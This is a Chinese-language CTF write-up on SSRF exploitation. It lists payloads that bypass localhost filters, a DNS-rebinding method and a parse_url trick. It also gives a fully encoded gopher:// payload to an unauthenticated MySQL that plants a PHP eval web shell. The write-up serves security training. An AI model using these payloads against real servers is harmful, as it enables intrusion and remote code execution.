浅谈SSRF漏洞
SSRF详解
SSRF(Server-Side Request Forgery)服务端请求为伪造,SSRF是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。
可以访问flag.php页面,访问后提示非本地用户禁止访问,所以要用ssrf来本地访问
url=http://localhost/flag.php
依旧是flag.php,但过滤了127.0.0.1和localhost。使用ip转数字
在线IP地址转Int数字、Int数字转IP地址
url=http://2130706433/flag.php
/localhost|127\.0\.|\。/i
不影响之前的payload
url=http://2130706433/flag.php
/localhost|1|0|。/
专门过滤了1和0。
找到一个A记录是127.0.0.1(http://sudo.cc/),然后把那个网站域名改成payload里的url
url=http://sudo.cc/flag.php
这里要求strlen($host)<=5
在百度127.0.0.1又可写成什么的时候,我发现了这个本机ip、127.0.0.1和0.0.0.0区别
既然全零地址是表示任意主机,我就想试一下0是不是可以代表0.0.0.0
然后尝试本地访问一下http://0/,他给我跳转到了https://0.0.0.0/
这样来说应该可以,于是尝试构造payload,成功
url=http://0/flag.php
这一次(strlen($host)<=3),那就用上面的payload
url=http://0/flag.php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$ip = gethostbyname($x['host']);
echo ''.$ip.'';
if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
die('ip!');
}
echo file_get_contents($_POST['url']);
}
else{
die('scheme');
}
if判断里的:
- FILTER_FLAG_IPV4 - 要求值是合法的 IPv4 IP
- FILTER_FLAG_IPV6 - 要求值是合法的 IPv6 IP
- FILTER_FLAG_NO_PRIV_RANGE - 要求值是 RFC 指定的私域 IP (比如 192.168.0.1)
- FILTER_FLAG_NO_RES_RANGE - 要求值不在保留的 IP 范围内。该标志接受 IPV4 和 IPV6 值。
DNS重绑定(DNS-Rebinding)漏洞:浅谈DNS重绑定漏洞
去http://ceye.io/注册一个账号,登录后会看到分配了一个域名
添加个DNS Rebinding为任意ip,再添加一个为127.0.0.1,否则payload打过去会直接显示127.0.0.1 ip!
然后POST:(记得在分配的域名前面加个r.)
url=http://r.xxxxxx.ceye.io/flag.php
然后多POST几次就可以了
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if(preg_match('/^http:\/\/ctf\..*show$/i',$url)){
echo file_get_contents($url);
}
这里的考到的是parse_url解析问题,参考文章:parse_url小结
http://ctf.@0/flag.php?show
打无密码的mysql
这里用之前做代码审计的时候用到的工具gopherus(https://github.com/tarunkant/Gopherus)
写一句话进去
然后找一下传参的点
这里有个点是需要再对gopher://127.0.0.1:3306/_后面的进行url编码,我就就直接用记事本替换了(把%替换成%25)
gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2547%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2527%253c%253f%2570%2568%2570%2520%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2531%255d%2529%253b%2520%253f%253e%2527%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2527%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2531%252e%2570%2568%2570%2527%253b%2501%2500%2500%2500%2501
然后打returl
web360打redis,把工具后面的mysql改成层redis即可
记得再url编码一次。